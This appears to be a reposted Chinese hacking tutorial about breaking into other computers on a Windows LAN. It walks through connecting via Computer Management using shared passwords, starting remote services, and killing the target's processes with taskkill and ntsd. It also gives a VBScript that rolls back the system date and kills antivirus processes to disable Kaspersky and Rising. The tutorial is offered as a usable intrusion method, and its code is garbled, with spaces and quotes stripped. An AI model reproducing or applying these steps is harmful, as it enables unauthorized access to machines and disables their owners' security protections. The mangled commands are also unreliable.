windows局域网的一个经典的入侵方法

局域网的一个经典的入侵方法

3年前我用的东西了可能大家比较老了不过也许现在还是能用上的不过大家不妨试验一下很有趣的。　　点我的电脑右键单机管理然后点操作底下的》连接到另外一个计算机。输入对方ip　　或者你不知道对方...

3年前我用的东西了可能大家比较老了不过也许现在还是能用上的不过大家不妨试验一下很有趣的。

点我的电脑右键单机管理然后点操作底下的》连接到另外一个计算机。输入对方ip

或者你不知道对方ip可以这样点浏览高级里的立即查找就可以显示本局域网工作组内的计算机了。然后双击你要进入的电脑呵呵一般局域网的计算机密码是一样的所以不需要NTLM验证不过那个验证比较老了现在不知道还有没有人会用进入后然后点服务和应用找到服务然后开启对方服务如果没有进入这些界面或者服务出错是因为对方没有开rpc服务当然还是选择放弃吧如果按照刚才步骤成功那恭喜你已经得到一个进入对方计算机的通道了。

然后在cmd底下输入对方ip地址就会显示对方的一个了当然这里有个小技巧如果你不知道对方ip怎么办。很简单cmd下输入可以查看到局域网计算机名然后点鼠标右键标记你要的计算机名字选中按下回车就复制到cmd的剪切板里了然后用ping命令ping粘贴你刚才复制的内容直接点右键就出来了然后就能看到你ping的ip了。

进入对方计算机该后该怎么做呢。呵呵很多黑客教程好像没有具体告诉我们下一步我们该怎么办吧嘿嘿。

发挥你的想象把对方电脑就当成你本机一样去对待比如你想查看对方进程。

　　cmd下输入

进程太多看不完怎么办|more

想杀掉他的进程怎么办

进程名字/t如关qqtaskkill/f/imqq.exe/t

　　或者有的用ntsd杀进程

ntsd-cq-pPID

PID是用他是用tasklist就可以看到的对照相应的PID就能杀进程

如果多次查杀对方进程不成功是什么原因很可能对方有杀毒软件或者防火墙

　　怎么去杀掉卡巴这些进程呢

这里有一个脚本

SetwsCreateObjectWscript.Shell

ws.runcmd/csetdate%date%date1988-1-1ping-n30127.0.0.1date%date%,vbhide

foreachpsingetobjectwinmgmts://./root/cimv2:win32_proCESs.instances_

　　ifps.Namerfwsrv.exethen

ws.runntsd-cq-pps.handle,0

我们可以这样去做echo加上面的每一行脚本代码c:/kill.vbs

　　最后在运行这个脚本就可以了。呵呵

也可以你觉得麻烦直接输入date然后加日期修改成1988年左右就行了卡巴就失效了

瑞星的原理也是taskkill掉了rfwsrv.exe这个进程使杀毒软件失效。

　　其他的就不用我说了自己研究点dos命令就可以搞定了。

本篇文章来源于黑客基地-全球最大的中文黑客站原文链接http://www.hackbase.com/tech/2008-11-01/42151.html